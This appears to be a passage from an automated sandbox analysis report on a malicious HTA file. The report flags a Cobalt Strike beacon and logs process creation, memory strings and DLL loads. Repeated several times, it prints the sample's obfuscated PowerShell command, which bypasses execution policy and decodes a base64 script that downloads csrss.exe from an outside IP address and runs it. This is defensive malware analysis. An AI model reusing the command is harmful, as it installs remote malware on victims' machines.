    Source: powershell.exe, 00000003.00000002.1277241225.00000000087E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.191.88/620/csrss.exe#
    Source: powershell.exe, 00000003.00000002.1275197546.0000000007730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
    Source: svchost.exe, 00000005.00000002.2396772651.0000020AE7400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
    Source: svchost.exe, 00000005.00000003.1204327509.0000020AE7618000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
    Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
    Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
    Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
    Source: svchost.exe, 00000005.00000003.1204327509.0000020AE7618000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
    Source: svchost.exe, 00000005.00000003.1204327509.0000020AE7618000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
    Source: svchost.exe, 00000005.00000003.1204327509.0000020AE764D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
    Source: edb.log.5.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
    Source: powershell.exe, 00000003.00000002.1271303624.000000000601A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000003.00000002.1268592235.0000000004FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000003.00000002.1277241225.00000000087D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
    Source: powershell.exe, 00000003.00000002.1268592235.0000000004FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
    Source: powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
    Source: powershell.exe, 00000003.00000002.1271303624.000000000601A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000003.00000002.1271303624.000000000601A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000003.00000002.1271303624.000000000601A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: svchost.exe, 00000005.00000003.1204327509.0000020AE76C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
    Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
    Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
    Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
    Source: svchost.exe, 00000005.00000003.1204327509.0000020AE76C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
    Source: powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000003.00000002.1271303624.000000000601A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: svchost.exe, 00000005.00000003.1204327509.0000020AE76C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
    Source: edb.log.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:

    System Summary

    barindex
    Detected Cobalt Strike Beacon
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))"Jump to behavior
    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
    Source: classification engineClassification label: mal92.expl.evad.winHTA@11/15@0/2
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sfj5lpnj.mgi.ps1Jump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: sdf.htaReversingLabs: Detection: 30%
    Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\sdf.hta"
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline"
    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA6B.tmp" "c:\Users\user\AppData\Local\Temp\l1pl2equ\CSC883B0A053CD34D78B131B177ADC31BC6.TMP"
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline"Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA6B.tmp" "c:\Users\user\AppData\Local\Temp\l1pl2equ\CSC883B0A053CD34D78B131B177ADC31BC6.TMP"Jump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
